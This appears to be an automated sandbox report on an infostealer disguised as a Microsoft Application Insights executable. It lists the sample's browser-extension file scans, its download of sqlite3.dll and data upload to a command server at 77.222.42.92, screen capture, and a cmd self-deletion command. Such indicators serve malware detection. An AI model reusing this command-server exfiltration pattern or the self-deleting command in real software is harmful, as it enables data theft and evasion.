Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Networking:

Source: global traffic	HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1Host: 77.222.42.92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /goodnews.php HTTP/1.1Host: 77.222.42.92Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 13 Sep 2021 13:55:33 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: keep-aliveLast-Modified: Tue, 24 Aug 2021 22:41:19 GMTETag: "9d9d8-5ca55d50d41c0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d

Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92
Source: unknown	TCP traffic detected without corresponding DNS query: 77.222.42.92

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.679113220.0000000002E91000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000B.00000003.709322669.00000000058E0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: https://dc.services.visualstudio.com/v2/trackY87C19923:
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: XBAIMOPZ.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /goodnews.php HTTP/1.1Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUSHost: 77.222.42.92Content-Length: 83420Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00403E70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET /public/sqlite3.dll HTTP/1.1Host: 77.222.42.92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /goodnews.php HTTP/1.1Host: 77.222.42.92Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_0040A840 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

.NET source code contains very large array initializations

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/C92710D4.cs	Large array initialization: System.UInt32[] 41CE8079.C92710D4::A9F02083: array initializer size 24732

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_00B0D8BE
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDDA8C
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDC088
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDE150
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 0_2_02DDA698
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040F550
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040EF50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040F360
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_0040FDE0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_005AD8BE

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: String function: 00403C80 appears 466 times

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAntiDump.dll2 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728533410.00000000011FB000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.727920654.0000000000B3F000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Binary or memory string: OriginalFilename vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000002.00000000.675135509.00000000005DF000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Binary or memory string: OriginalFilenameMicrosoft.ApplicationInsights.PersistenceChannel.dll vs Microsoft.ApplicationInsights.PersistenceChannel.exe

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Section loaded: onecoreuapcommonproxystub.dll

Source: sqlite3.dll.2.dr	Static PE information: Number of sections : 19 > 10
Source: sqlite3[1].dll.2.dr	Static PE information: Number of sections : 19 > 10

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Virustotal: Detection: 40%
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File read: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Jump to behavior

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe'
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFBB.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.spyw.evad.winEXE@9/9@0/1

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: sqlite3.dll.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: sqlite3.dll.2.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
